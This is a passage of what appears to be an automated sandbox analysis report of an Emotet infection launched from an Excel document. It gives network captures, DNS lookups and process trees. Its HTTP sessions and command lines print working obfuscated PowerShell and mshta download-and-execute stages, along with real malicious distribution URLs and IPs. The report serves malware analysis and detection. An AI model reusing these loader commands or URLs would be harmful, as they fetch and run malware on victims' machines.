                                                                                                                    Jan 28, 2022 21:18:51.196340084 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.196363926 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.196367979 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.196386099 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.196408033 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.196413994 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.196430922 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.196451902 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.196460009 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.196472883 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.196494102 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.196501017 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.196517944 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.196542978 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.196549892 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.196566105 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.196593046 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.373228073 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.373260021 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.373276949 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.373294115 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.373310089 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.373326063 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.373342037 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.373358011 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.373374939 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.373378038 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.373390913 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.373399973 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.373405933 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.373421907 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.373421907 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.373437881 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.373454094 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.373471022 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.373471022 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.373486996 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.373487949 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.373503923 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.373518944 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.373522997 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.373537064 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.373552084 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.373553038 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.373569012 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.373584032 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.373584032 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.373615026 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.375550985 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.375581980 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.375602007 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.375622988 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.375629902 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.375639915 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.375653982 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.375663042 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.375682116 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.375694990 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.375699043 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.375719070 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.375727892 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.375739098 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.375755072 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.375768900 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.609654903 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:56.201759100 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:56.201906919 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:19:32.775798082 CET804916891.240.118.172192.168.2.22
                                                                                                                    Jan 28, 2022 21:19:32.775901079 CET4916880192.168.2.2291.240.118.172
                                                                                                                    Jan 28, 2022 21:20:07.823296070 CET4916880192.168.2.2291.240.118.172
                                                                                                                    Jan 28, 2022 21:20:07.884641886 CET804916891.240.118.172192.168.2.22
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 28, 2022 21:18:27.823419094 CET | 52167 | 53 | 192.168.2.22 | 8.8.8.8
Jan 28, 2022 21:18:28.062777996 CET | 53 | 52167 | 8.8.8.8 | 192.168.2.22
Jan 28, 2022 21:18:49.192480087 CET | 50591 | 53 | 192.168.2.22 | 8.8.8.8
Jan 28, 2022 21:18:49.210891008 CET | 53 | 50591 | 8.8.8.8 | 192.168.2.22
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jan 28, 2022 21:18:27.823419094 CET | 192.168.2.22 | 8.8.8.8 | 0x7e8e | Standard query (0) | hostfeeling.com | A (IP address) | IN (0x0001)
Jan 28, 2022 21:18:49.192480087 CET | 192.168.2.22 | 8.8.8.8 | 0xf8cf | Standard query (0) | jurnalpjf.lan.go.id | A (IP address) | IN (0x0001)
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jan 28, 2022 21:18:28.062777996 CET | 8.8.8.8 | 192.168.2.22 | 0x7e8e | No error (0) | hostfeeling.com |  | 164.90.147.135 | A (IP address) | IN (0x0001)
Jan 28, 2022 21:18:49.210891008 CET | 8.8.8.8 | 192.168.2.22 | 0xf8cf | No error (0) | jurnalpjf.lan.go.id |  | 103.206.244.105 | A (IP address) | IN (0x0001)
                                                                                                                    • 91.240.118.172
                                                                                                                    • jurnalpjf.lan.go.id
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49167 | 91.240.118.172 | 80 | C:\Windows\System32\mshta.exe

Timestamp | kBytes transferred | Direction | Data
Jan 28, 2022 21:18:21.887382984 CET | 0 | OUT | GET /gg/ff/fe.html HTTP/1.1
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US
                                                                                                                    UA-CPU: AMD64
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                    Host: 91.240.118.172
                                                                                                                    Connection: Keep-Alive
Jan 28, 2022 21:18:21.949342966 CET | 2 | IN | HTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.20.2
                                                                                                                    Date: Fri, 28 Jan 2022 20:18:21 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: keep-alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49168 | 91.240.118.172 | 80 | C:\Windows\System32\mshta.exe

Timestamp | kBytes transferred | Direction | Data
Jan 28, 2022 21:18:27.714525938 CET | 13 | OUT | GET /gg/ff/fe.png HTTP/1.1
                                                                                                                    Host: 91.240.118.172
                                                                                                                    Connection: Keep-Alive
Jan 28, 2022 21:18:27.776531935 CET | 14 | IN | HTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.20.2
                                                                                                                    Date: Fri, 28 Jan 2022 20:18:27 GMT
                                                                                                                    Content-Type: image/png
                                                                                                                    Content-Length: 1199
                                                                                                                    Connection: keep-alive
                                                                                                                    Last-Modified: Fri, 28 Jan 2022 14:54:48 GMT
                                                                                                                    ETag: "4af-5d6a59dbe5e00"
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    Data Ascii: $path = "C{seeda}:\Pr{seeda}ogramD{seeda}ata\{seeda}JooSee.d{seeda}ll".replace('{seeda}','');$url1 = 'http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/';$url2 = 'http://jurnalpjf.lan.go.id/assets/iM/';$url3 = 'http://it-o.biz/bitrix/xoDdDe/';$url4 = 'http://bimesarayenovin.ir/wp-admin/G1pYGL/';$url5 = 'http://gardeningfilm.com/wp-content/pcMVUYDQ3q/';$url6 = 'http://daisy.sukoburu-secure.com/8plks/v8lyZTe/';$url7 = 'https://property-eg.com/mlzkir/97v/';$url8 = 'http://totalplaytuxtla.com/sitio/DgktL3zd/';$url9 = 'http://maxtdeveloper.com/okw9yx/Gc28ZX/';$url10 = 'http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/';$url11 = 'http://activetraining.sytes.net/libraries/8s/';$url12 = 'https://gudangtasorichina.com/wp-content/GG01c/';$web = New-Object net.webclient;$urls = "$url1,$url2,$url3,$url4,$url5,$url6,$url7,$url8,$url9,$url10,$url11,$url12".split(",");foreach ($url in $urls) { try { $web.DownloadFile($url, $path); if ((Get-Item $path).Length -ge 30000) { [Diagnostics.Process]; break; } }
Jan 28, 2022 21:18:27.776552916 CET | 14 | IN |
                                                                                                                    Data Ascii: catch{}} Sleep -s 4;cmd /c C:\Windows\SysWow64\rundll32.exe 'C:\ProgramData\JooSee.dll',ssAAqq;


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.22 | 49170 | 103.206.244.105 | 80 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | kBytes transferred | Direction | Data
Jan 28, 2022 21:18:49.391053915 CET | 15 | OUT | GET /assets/iM/ HTTP/1.1
                                                                                                                    Host: jurnalpjf.lan.go.id
                                                                                                                    Connection: Keep-Alive
Jan 28, 2022 21:18:49.579858065 CET | 17 | IN | HTTP/1.1 200 OK
                                                                                                                    Date: Fri, 28 Jan 2022 20:18:49 GMT
                                                                                                                    Server: Apache/2.4.6 (CentOS) PHP/7.4.27
                                                                                                                    X-Powered-By: PHP/7.4.27
                                                                                                                    Set-Cookie: 61f44fa975c8c=1643401129; expires=Fri, 28-Jan-2022 20:19:49 GMT; Max-Age=60; path=/
                                                                                                                    Cache-Control: no-cache, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Last-Modified: Fri, 28 Jan 2022 20:18:49 GMT
                                                                                                                    Expires: Fri, 28 Jan 2022 20:18:49 GMT
                                                                                                                    Content-Disposition: attachment; filename="KfCx9N.dll"
                                                                                                                    Content-Transfer-Encoding: binary
                                                                                                                    Content-Length: 548864
                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Content-Type: application/x-msdownload



                                                                                                                    Target ID:0
                                                                                                                    Start time:21:18:18
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                                                                    Imagebase:0x13f7b0000
                                                                                                                    File size:28253536 bytes
                                                                                                                    MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high

                                                                                                                    Target ID:2
                                                                                                                    Start time:21:18:20
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html
                                                                                                                    Imagebase:0x4aa90000
                                                                                                                    File size:345088 bytes
                                                                                                                    MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high

                                                                                                                    Target ID:4
                                                                                                                    Start time:21:18:21
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\System32\mshta.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:mshta http://91.240.118.172/gg/ff/fe.html
                                                                                                                    Imagebase:0x13fa50000
                                                                                                                    File size:13824 bytes
                                                                                                                    MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high

                                                                                                                    Target ID:6
                                                                                                                    Start time:21:18:24
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                                                                                                                    Imagebase:0x13ff60000
                                                                                                                    File size:473600 bytes
                                                                                                                    MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                    Reputation:high

                                                                                                                    Target ID:8
                                                                                                                    Start time:21:18:59
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
                                                                                                                    Imagebase:0x4a6d0000
                                                                                                                    File size:345088 bytes
                                                                                                                    MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high

                                                                                                                    Target ID:9
                                                                                                                    Start time:21:18:59
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
                                                                                                                    Imagebase:0x4e0000
                                                                                                                    File size:44544 bytes
                                                                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.504836959.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    Reputation:high

                                                                                                                    Target ID:10
                                                                                                                    Start time:21:19:03
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer
                                                                                                                    Imagebase:0x4e0000
                                                                                                                    File size:44544 bytes
                                                                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.561150759.0000000002130000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.561065386.00000000004A0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.561626313.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.561662235.0000000003181000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.561110360.0000000002101000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.560982656.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.561451631.0000000002871000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.561377294.0000000002410000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.561295967.00000000023A1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.560945911.0000000000340000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.561541228.0000000002E11000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.561700746.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.561513666.0000000002DE0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.561271615.0000000002370000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.561230347.00000000022F1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    Reputation:high

                                                                                                                    Target ID:12
                                                                                                                    Start time:21:19:26
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jssipnq\wpnzacwyitgbmx.rxn",rltAjgVv
                                                                                                                    Imagebase:0x4e0000
                                                                                                                    File size:44544 bytes
                                                                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.563589206.00000000001B1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.563561570.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.563850517.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                    Reputation:high

                                                                                                                    Target ID:13
                                                                                                                    Start time:21:19:31
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jssipnq\wpnzacwyitgbmx.rxn",DllRegisterServer
                                                                                                                    Imagebase:0x4e0000
                                                                                                                    File size:44544 bytes
                                                                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.620421483.0000000002651000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.620926031.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.619911631.0000000000221000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.620976859.0000000003111000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.620028804.0000000000391000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.620781732.0000000002910000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.620753571.00000000028E1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.620558528.00000000027B1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.620134635.00000000004B0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.619872548.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.621014524.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.620852430.0000000002ED1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.620492443.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.619980737.0000000000360000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.620621291.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    Reputation:high

                                                                                                                    Target ID:14
                                                                                                                    Start time:21:19:53
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Lpsbm\hfdnu.nlm",NLOfvkgYs
                                                                                                                    Imagebase:0x4e0000
                                                                                                                    File size:44544 bytes
                                                                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.623757227.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.623291568.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.623338464.0000000000301000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                                                                                    Target ID:15
                                                                                                                    Start time:21:19:58
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Lpsbm\hfdnu.nlm",DllRegisterServer
                                                                                                                    Imagebase:0x4e0000
                                                                                                                    File size:44544 bytes
                                                                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.679498941.0000000002E40000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.679023916.00000000004B1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.679099785.0000000000971000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.679434577.00000000029E1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.679378273.0000000002920000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.684161589.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, Author: Joe Security
